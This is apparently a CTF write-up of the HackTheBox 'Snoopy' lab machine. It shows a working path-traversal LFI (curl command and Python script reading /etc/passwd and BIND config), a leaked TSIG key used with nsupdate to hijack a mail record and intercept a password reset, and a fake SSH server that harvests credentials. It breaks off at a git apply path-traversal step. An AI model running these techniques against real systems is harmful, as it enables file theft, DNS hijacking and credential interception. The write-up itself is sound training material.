> For the complete documentation index, see [llms.txt](https://ajaykumar-kanthi.gitbook.io/write-ups/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://ajaykumar-kanthi.gitbook.io/write-ups/hackthebox-cpts-track/htb-snoopy.md).

# HTB - Snoopy

Snoopy is a Hard Rated Linux Machine.

## Enumeration

#### NMAP

```bash
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
53/tcp open  domain  ISC BIND 9.18.12-0ubuntu0.22.04.1 (Ubuntu Linux)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

### DNS

```bash
┌──(ajay㉿kali)-[~]
└─$ dig axfr @10.129.229.5 snoopy.htb     

; <<>> DiG 9.20.20-1-Debian <<>> axfr @10.129.229.5 snoopy.htb
; (1 server found)
;; global options: +cmd
snoopy.htb.             86400   IN      SOA     ns1.snoopy.htb. ns2.snoopy.htb. 2022032612 3600 1800 604800 86400
snoopy.htb.             86400   IN      NS      ns1.snoopy.htb.
snoopy.htb.             86400   IN      NS      ns2.snoopy.htb.
mattermost.snoopy.htb.  86400   IN      A       172.18.0.3
mm.snoopy.htb.          86400   IN      A       127.0.0.1
ns1.snoopy.htb.         86400   IN      A       10.0.50.10
ns2.snoopy.htb.         86400   IN      A       10.0.51.10
postgres.snoopy.htb.    86400   IN      A       172.18.0.2
provisions.snoopy.htb.  86400   IN      A       172.18.0.4
www.snoopy.htb.         86400   IN      A       127.0.0.1
snoopy.htb.             86400   IN      SOA     ns1.snoopy.htb. ns2.snoopy.htb. 2022032612 3600 1800 604800 86400
;; Query time: 71 msec
;; SERVER: 10.129.229.5#53(10.129.229.5) (TCP)
;; WHEN: Mon Jun 01 11:41:41 EDT 2026
;; XFR size: 11 records (messages 1, bytes 325)
```

DNS zone transfer succeeds and leaks the internal DNS zone, revealing several subdomains: `mattermost.snoopy.htb`, `mm.snoopy.htb`, `postgres.snoopy.htb`, and `provisions.snoopy.htb`. Add these to `/etc/hosts`.

### HTTP - Snoopy.htb

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FYdylCws2yNeaswmvQwLz%2Fimage.png?alt=media&amp;token=79e70098-45dc-41bd-93fc-d4c095489379" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FLGJZKM7MivLtACQ8NoJe%2Fimage.png?alt=media&amp;token=755cb71b-479c-4b29-a4de-14256c252f0c" alt=""><figcaption></figcaption></figure>

found email pattern.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FfqPGUpeypP7nB1iiCBEG%2Fimage.png?alt=media&amp;token=0a10f609-0136-40e5-8f2b-77b13b475335" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2F6Km6LZo73BsQYJX0J3kX%2Fimage.png?alt=media&amp;token=106f7ee1-0b93-42e4-805d-e35d1529fe46" alt=""><figcaption></figcaption></figure>

there is a contact form is not able to load email library.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FRZDb5X6K9k8UBcZlZOMa%2Fimage.png?alt=media&amp;token=c3cc03f7-df7b-44cf-86ca-b44d8898b0a2" alt=""><figcaption></figcaption></figure>

The alert says that mail server is currently offline.

snoopy.htb has downloads links on the page.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FdXT8NlikMFOW6XH89uXy%2Fimage.png?alt=media&amp;token=0a919e29-60b3-416b-a618-db763a56ebf8" alt=""><figcaption></figcaption></figure>

clicking on release package results in the below request

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FrPiOsSxwV4FUs5iUHzyY%2Fimage.png?alt=media&amp;token=fecfe2c8-73cc-4d36-aa15-f0b459bd438b" alt=""><figcaption></figcaption></figure>

and clicking on announcement link results in

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2F1sqf9i3OXlH5hxPhfWVe%2Fimage.png?alt=media&amp;token=efec7df5-87a1-4e55-b197-5ab8a8b7aae8" alt=""><figcaption></figcaption></figure>

it uses a file parameter to load the file announcement.pdf. which we can utilize and look for LFI. Also the downloaded pdf file leaked the contact details of Sally Brown.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FfOGNQI0XCy4OUqjXecfM%2Fimage.png?alt=media&amp;token=e44b41a3-a47b-4ada-9c17-8aa8d2d93e88" alt=""><figcaption></figcaption></figure>

#### mm.snoopy.htb

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2F3lgBFAGF3uIkA5dHNTM2%2Fimage.png?alt=media&amp;token=3591e6d0-c135-447b-96b4-4e7d32f6e6e7" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FHVEVAZneLeZKUZU55R48%2Fimage.png?alt=media&amp;token=4fe62431-697f-4b5b-b5d4-9f4e5c86cb4d" alt=""><figcaption></figcaption></figure>

tried weak passwords like admin: admin but didnot work.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FyjqJtqnAYClp6N7L148p%2Fimage.png?alt=media&amp;token=553d3e7a-9af1-4e5b-b538-9cf54ab3c8de" alt=""><figcaption></figcaption></figure>

Version of mattermost instance. There is a password reset option, through which a link is sent to mail to reset password which we can investigate later.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2F9cwTxKsKHLGZu5pYODod%2Fimage.png?alt=media&amp;token=a95d0128-8b84-4da9-adee-39cf9730023e" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FkC4jR9MfPor0b6WpkXqt%2Fimage.png?alt=media&amp;token=26bbb402-b526-4427-931d-c6339224b231" alt=""><figcaption></figcaption></figure>

## LFI via Path Traversal

The server strips `../` from the `file` parameter using a simple regex (`preg_replace`), but it only strips one occurrence.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FlLpnNTOolBy4JwibVHmQ%2Fimage.png?alt=media&amp;token=4cef1084-06a9-4804-bdb1-8a849f0dcbba" alt=""><figcaption></figcaption></figure>

The bypass is to double-encode the traversal:

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FkO4x3MzJJKfe8pjhUYdG%2Fimage.png?alt=media&amp;token=a96de2a1-b2b9-45b6-9f7c-0007da2f1f6c" alt=""><figcaption></figcaption></figure>

The response comes back as a zip archive containing the file nested under `press_package/`.

```bash
                                                                                                                                                                                                                                            
┌──(ajay㉿kali)-[~]
└─$ curl -s "http://snoopy.htb/download?file=....//....//....//....//....//....//etc/passwd" -o passwd.zip

┌──(ajay㉿kali)-[~]
└─$ unzip passwd.zip                                            
Archive:  passwd.zip
  inflating: press_package/etc/passwd
  
┌──(ajay㉿kali)-[~/press_package/etc]
└─$ cat passwd            
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-network:x:101:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:104::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:104:105:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
pollinate:x:105:1::/var/cache/pollinate:/bin/false
sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
usbmux:x:107:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
cbrown:x:1000:1000:Charlie Brown:/home/cbrown:/bin/bash
sbrown:x:1001:1001:Sally Brown:/home/sbrown:/bin/bash
clamav:x:1002:1003::/home/clamav:/usr/sbin/nologin
lpelt:x:1003:1004::/home/lpelt:/bin/bash
cschultz:x:1004:1005:Charles Schultz:/home/cschultz:/bin/bash
vgray:x:1005:1006:Violet Gray:/home/vgray:/bin/bash
bind:x:108:113::/var/cache/bind:/usr/sbin/nologin
_laurel:x:999:998::/var/log/laurel:/bin/false
                                                                                                                                                                                                                                            
```

So what happens here is that abusing the Local file read vulnerability we can read internal files which are downloaded using our payload in zip format. So we need to manually unzip each file that we look into for enumerating further. Thanks to 0xdf and ippsec for showing the way of using python script to automate the process.

To automate this process with Python, you will want to build a script that handles two main tasks: **sending the HTTP request** to fetch the file, and **extracting the contents** of the resulting zip file programmatically so you don't have to manually run `unzip` and `cat` every time.

### Building Python program to extract zip file

So firstly we need the following modules for writing the program:

zipfile : for handling the zip files extracting and reading them.

io : to handle the files ion memory instead extracting it to a zip on local machine.

requests : to get the file

sys : Used to handle **command-line arguments** passed directly from the terminal (via `sys.argv`), allowing your script to accept the file path instantly without needing an interactive prompt.

```python
import requests 
import zipfile
from io import BytesIO
import sys

base_url = "http://snoopy.htb/download"
payload = "....//....//....//....//"

# 2. Check if an argument was passed in the terminal
if len(sys.argv) > 1:
    target_file = sys.argv[1]  # Grab the argument directly
else:
    # Fallback to manual input if no argument was provided
    print("Enter target file path (e.g., etc/passwd):")
    target_file = input()

#print("Enter target file path (e.g., etc/passwd):")
#target_file = input()

# Fixed the closing quote
url = f"{base_url}?file={payload}{target_file}"

# Sending the request
req = requests.get(url)

# The response from the server is in req variable.
if req.status_code == 200:
    # Fixed variable name from response.content to req.content
    zip_buffer = BytesIO(req.content)
    
    # Open and extract the zip file
    with zipfile.ZipFile(zip_buffer, 'r') as zip_ref:
        internal_path = f"press_package/{target_file}"
        
        # Read the file directly using the string path
        content = zip_ref.read(internal_path).decode('utf-8', errors='ignore')
        
        print(content)
else:
    print(f"Failed to retrieve file. Status code: {req.status_code}")

```

```bash
──(ajay㉿kali)-[~]
└─$ python3 payload.py etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-network:x:101:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:104::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:104:105:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
pollinate:x:105:1::/var/cache/pollinate:/bin/false
sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
usbmux:x:107:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
cbrown:x:1000:1000:Charlie Brown:/home/cbrown:/bin/bash
sbrown:x:1001:1001:Sally Brown:/home/sbrown:/bin/bash
clamav:x:1002:1003::/home/clamav:/usr/sbin/nologin
lpelt:x:1003:1004::/home/lpelt:/bin/bash
cschultz:x:1004:1005:Charles Schultz:/home/cschultz:/bin/bash
vgray:x:1005:1006:Violet Gray:/home/vgray:/bin/bash
bind:x:108:113::/var/cache/bind:/usr/sbin/nologin
_laurel:x:999:998::/var/log/laurel:/bin/false
```

Reading `/etc/bind/named.conf` reveals a TSIG key used for dynamic DNS updates:

```bash
──(ajay㉿kali)-[~]
└─$ python3 payload.py /etc/bind/named.conf   
// This is the primary configuration file for the BIND DNS server named.
//
// Please read /usr/share/doc/bind9/README.Debian.gz for information on the 
// structure of BIND configuration files in Debian, *BEFORE* you customize 
// this configuration file.
//
// If you are just adding zones, please do that in /etc/bind/named.conf.local

include "/etc/bind/named.conf.options";
include "/etc/bind/named.conf.local";
include "/etc/bind/named.conf.default-zones";

key "rndc-key" {
    algorithm hmac-sha256;
    secret "BEqUtce80uhu3TOEGJJaMlSx9WT2pkdeCtzBeDykQQA=";
};

```

And `named.conf.local` confirms that this key permits dynamic updates to the `snoopy.htb` zone:

```bash
┌──(ajay㉿kali)-[~]
└─$ python3 payload.py etc/bind/named.conf.local                                                               
//
// Do any local configuration here
//

// Consider adding the 1918 zones here, if they are not used in your
// organization
//include "/etc/bind/zones.rfc1918";

zone "snoopy.htb" IN {
    type master;
    file "/var/lib/bind/db.snoopy.htb";
    allow-update { key "rndc-key"; };
    allow-transfer { 10.0.0.0/8; };
};

```

```bash
┌──(ajay㉿kali)-[~]
└─$ python3 payload.py var/lib/bind/db.snoopy.htb
$ORIGIN .
$TTL 86400      ; 1 day
snoopy.htb              IN SOA  ns1.snoopy.htb. ns2.snoopy.htb. (
                                2022032612 ; serial
                                3600       ; refresh (1 hour)
                                1800       ; retry (30 minutes)
                                604800     ; expire (1 week)
                                86400      ; minimum (1 day)
                                )
                        NS      ns1.snoopy.htb.
                        NS      ns2.snoopy.htb.
$ORIGIN snoopy.htb.
$TTL 86400      ; 1 day
mattermost              A       172.18.0.3
mm                      A       127.0.0.1
ns1                     A       10.0.50.10
ns2                     A       10.0.51.10
mattermost              A       172.18.0.3
postgres                A       172.18.0.2
provisions              A       172.18.0.4
www                     A       127.0.0.1

```

This explains why we had the zone transfer.

But looking at the `etc/bind/named.conf.local` we can see the that with rndc-key we can update the DNS records.

The `allow-update { key "rndc-key"; };` directive allows authenticated dynamic DNS updates to the `snoopy.htb` zone. Since the TSIG secret for `rndc-key` is present in the configuration, an attacker who obtains this key may be able to add, modify, or delete DNS records in the zone, provided the DNS server accepts update requests from their network location.

Since you have the key, you can use a native Linux tool called **`nsupdate`** to inject or modify DNS records on the fly.

Since the mail server is offline we can add the mail records to the DNS and trigger a password reset on the website to trigger a capture of credentials on the smtp server we setup.

## Updating DNS records with NSUPDATE

```bash
──(ajay㉿kali)-[~]
└─$ nsupdate -y hmac-sha256:rndc-key:BEqUtce80uhu3TOEGJJaMlSx9WT2pkdeCtzBeDykQQA= << EOF
server 10.129.229.5
zone snoopy.htb
update delete mail.snoopy.htb A
update add mail.snoopy.htb 30 A 10.10.15.204
send
EOF
```

Run dig to confirm.

```bash
┌──(ajay㉿kali)-[~]
└─$ dig mail.snoopy.htb @10.129.229.5

; <<>> DiG 9.20.20-1-Debian <<>> mail.snoopy.htb @10.129.229.5
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 60090
;; flags: qr aa rd; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1
;; WARNING: recursion requested but not available

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 1232
; COOKIE: 1610176df37d3eff010000006a1dc36072bcf841a1d9d8ee (good)
;; QUESTION SECTION:
;mail.snoopy.htb.               IN      A

;; ANSWER SECTION:
mail.snoopy.htb.        30      IN      A       10.10.15.204

;; Query time: 120 msec
;; SERVER: 10.129.229.5#53(10.129.229.5) (UDP)
;; WHEN: Mon Jun 01 13:37:37 EDT 2026
;; MSG SIZE  rcvd: 
```

Next reset the password.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FnC5NALRMNwPVnZGq4wKR%2Fimage.png?alt=media&amp;token=3ed4bbb0-ffac-4ed6-8412-70462501aa6a" alt=""><figcaption></figcaption></figure>

says failed when i looked back to run the dig again the mail record is not added so probably theres a time limit on it so we have to be quick.

ow when i have repeated the process again i got a connection on my nc listener.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FYYe6YrDAhzVUHwyUPdMB%2Fimage.png?alt=media&amp;token=0644d62a-68c5-4810-9be7-e06d7b78a65f" alt=""><figcaption></figcaption></figure>

So i have used the smtp fake server.

install swaks + use python smtplib fake server:

```
sudo pip3 install aiosmtpd --break-system-packages
sudo python3 -m aiosmtpd -n -l 0.0.0.0:25
```

Next created the mail record and runned the password reset this time it was successful.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FoeYII5YOlwZUYHyyrsBT%2Fimage.png?alt=media&amp;token=e5394fa6-ce0d-4753-9662-582314d9308e" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FqUn2hvwCvZ6WrIKY7g59%2Fimage.png?alt=media&amp;token=f7036aba-1fe6-4951-847f-f634d60baaf8" alt=""><figcaption></figcaption></figure>

Got a link to reset the password.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2Fg6KptEFtijcp2om1IrCS%2Fimage.png?alt=media&amp;token=dfbbce1e-cb38-4046-9849-ad9baf093ef1" alt=""><figcaption></figcaption></figure>

Updating the password gives the below error.

Looking at the token the `=3D` in the email is quoted-printable encoding for =. The token got mangled.\
Editing the token and the below is the actual url.

```
http://mm.snoopy.htb/reset_password_complete?token=sjottfbg4c8camib3zih1u8u6r79hsjcswtrmxhxfp43as66eqekw4gnb6gnggnc
```

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FqzDlganlUUzeVyaD2tk1%2Fimage.png?alt=media&amp;token=a14a2fa7-e6bf-4033-b4ac-2546cf37f13c" alt=""><figcaption></figcaption></figure>

We can login with the credentials

`sbrown@snoopy.htb : Password@123!`

## Sbrown Mattermost Access

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FdFjYX9QaikmOnBTp78WT%2Fimage.png?alt=media&amp;token=a431918d-1d0c-4654-a7fc-53ba03e1fa03" alt=""><figcaption></figcaption></figure>

Looking at the chat below are the findings.

1. sbrown created a channel for server provisions
2. There is a talk about opensource antivirus called ClamAV
3. It's an open-source antivirus software that can detect and remove various types of malware. We're currently using it now for some of our servers.

Looking for the channel resulted in

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FqTl6D5CF0lkkUgXwnaSB%2Fimage.png?alt=media&amp;token=2465a964-0d38-4955-b230-aaaa6dcfb2a5" alt=""><figcaption></figcaption></figure>

But there is nothing in it.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2F91vugjtt5BfV09qWYXNm%2Fimage.png?alt=media&amp;token=3d56b312-30ae-4578-bacd-59584b0006f1" alt=""><figcaption></figcaption></figure>

SO i have tried the same above step using the user `cschultz.`

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2F1nDRxjYdzbwrOIRHeydW%2Fimage.png?alt=media&amp;token=acbe8c99-1ab2-46fc-856b-4b211d36b3f6" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FJ4eOLpKZorIt5dlCn3PI%2Fimage.png?alt=media&amp;token=c8043c6d-b2d9-4b2f-aeba-22e1212b054f" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2F6l46n3pjsFzMcywybWj6%2Fimage.png?alt=media&amp;token=cc0e5941-7da8-4710-aaf9-68fed976600b" alt=""><figcaption></figcaption></figure>

if you need assistance from an online staff member to request a new server provision you can use the slash command `/server_provision.`

Running the command results in a request for new provision.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FPi5t7HRqOrBL0X7gFLsn%2Fimage.png?alt=media&amp;token=524f6ef5-2da5-4e08-b314-27db69c7de75" alt=""><figcaption></figcaption></figure>

Lets see if we can try to get a shell on this my entering our IP.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FsPPNEzfrXfM4FkSNFaSp%2Fimage.png?alt=media&amp;token=3149e91b-d2db-407d-a203-c9bbe30186b8" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FpptRZ9TPyHhXqgeSmdqU%2Fimage.png?alt=media&amp;token=3d5e1ddd-6eae-4d03-a9b0-388e5c5664cf" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2F0MVjXJWxmogDKhRzNGY8%2Fimage.png?alt=media&amp;token=2d69e292-9724-41bb-9090-9a0db9419a4d" alt=""><figcaption></figcaption></figure>

Got a connection on ssh but it killed.

This tells us that the backend server is running a automated **Python script** using the **`Paramiko`** library to establish a programmatic SSH connection to the IP address you submitted and then checking at the mattermost i got a text from crbown.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FOIHJBJd3qglQWBoekA44%2Fimage.png?alt=media&amp;token=57bfe50c-cb1c-4734-acee-331d8cfe2a24" alt=""><figcaption></figcaption></figure>

## Exploiting Paramiko / SSH Clients

When an automated script uses an SSH library like Paramiko to connect to a server controlled by you, it expects your server to behave like a normal SSH server. Because you control the "server" they are connecting to, you can set up a custom SSH server to see what information the client sends during authentication.

During an SSH connection attempt, the client generally tries to authenticate using credentials or keys. If the script is built to automatically log into new provisions, it might attempt to authenticate using:

* A default password
* A specific private key or passphrase

To capture or view these authentication attempts, you cannot use basic `nc`. Instead, you need a tool that can fully simulate an SSH handshake.

There are many ssh-honeypots in github but i got several issues with dependencies so i had to use gemini to make a fake ssh server.

```bash
import socket
import sys
import threading
import paramiko

# 1. Implement the minimal Server interface required by Paramiko
class FakeSSHServer(paramiko.ServerInterface):
    def __init__(self):
        self.event = threading.Event()

    def check_auth_password(self, username, password):
        # This is where the magic happens: print the plaintext credentials!
        print(f"\n[+] SUCCESS! Captured Credentials:")
        print(f"    Username: {username}")
        print(f"    Password: {password}\n")
        return paramiko.AUTH_FAILED  # Keep failing to reset or close nicely

    def check_channel_request(self, kind, chanid):
        return paramiko.OPEN_SUCCEEDED

if __name__ == "__main__":
    # Generate a temporary host key if you don't have one
    # Or generate one via terminal: ssh-keygen -t rsa -f test_rsa.key
    try:
        host_key = paramiko.RSAKey.generate(2048)
    except Exception as e:
        print(f"[-] Key generation failed: {e}")
        sys.exit(1)

    # Bind socket to port 2222
    server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    
    try:
        server_socket.bind(('0.0.0.0', 2222))
        server_socket.listen(10)
        print("[*] Fake SSH Server listening on port 2222...")
    except Exception as e:
        print(f"[-] Bind failed: {e}")
        sys.exit(1)

    while True:
        try:
            client_socket, addr = server_socket.accept()
            print(f"[*] Connection received from {addr[0]}:{addr[1]}")
            
            transport = paramiko.Transport(client_socket)
            transport.add_server_key(host_key)
            
            server = FakeSSHServer()
            transport.start_server(server=server)
            
        except KeyboardInterrupt:
            break
        except Exception as e:
            print(f"[-] Error handling connection: {e}")

```

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FMFZyWBN9GhfZwOn52dAn%2Fimage.png?alt=media&amp;token=39bef5d0-878a-4d4f-9b1a-16a81f509823" alt=""><figcaption></figcaption></figure>

## Shell as Cbrown

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FWHeRD91bzAL867xbXdE8%2Fimage.png?alt=media&amp;token=2a048304-24dc-4431-b933-de7d4b8304bb" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FMRkAQzDHGcQqwmd8nUhh%2Fimage.png?alt=media&amp;token=10829c36-32d0-4047-bfa9-540a9b49de4d" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FKIiK7J84Yr7W2V3dtK84%2Fimage.png?alt=media&amp;token=bce522d6-3c7a-41a7-9f5b-e0de8a934254" alt=""><figcaption></figcaption></figure>

The interesting part of the sudo rule is:

```
(sbrown) PASSWD: /usr/bin/git ^apply -v [a-zA-Z0-9.]+$
```

This means cbrown can run only:

```
sudo-u sbrown /usr/bin/git apply-v <filename>
```

where `<filename>` contains only letters, numbers, and dots.

A few observations:

* You **cannot** directly pass extra git options (`-help`, `-index`, etc.).
* You **cannot** use paths containing `/`.
* You **can** control the contents of the patch file that `git apply` processes.

So to exploit furthur, i have checked the git version on the machine and searched for any exploits.

```bash
cbrown@snoopy:~$ git --version
git version 2.34.1
cbrown@snoopy:~$ 
```

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FKVyQDBZCCZpnGCmD75hl%2Fimage.png?alt=media&amp;token=85e5f157-8424-4b0b-b22f-6d6fcd1b54d2" alt=""><figcaption></figcaption></figure>

### Git Apply - Path Traversal

A git apply path traversal exploit involves supplying a maliciously crafted patch file containing directory traversal sequences (such as ../). This forces the git apply command to write or overwrite files outside the intended working directory, potentially leading to unauthorized system configuration modifications or remote code execution\
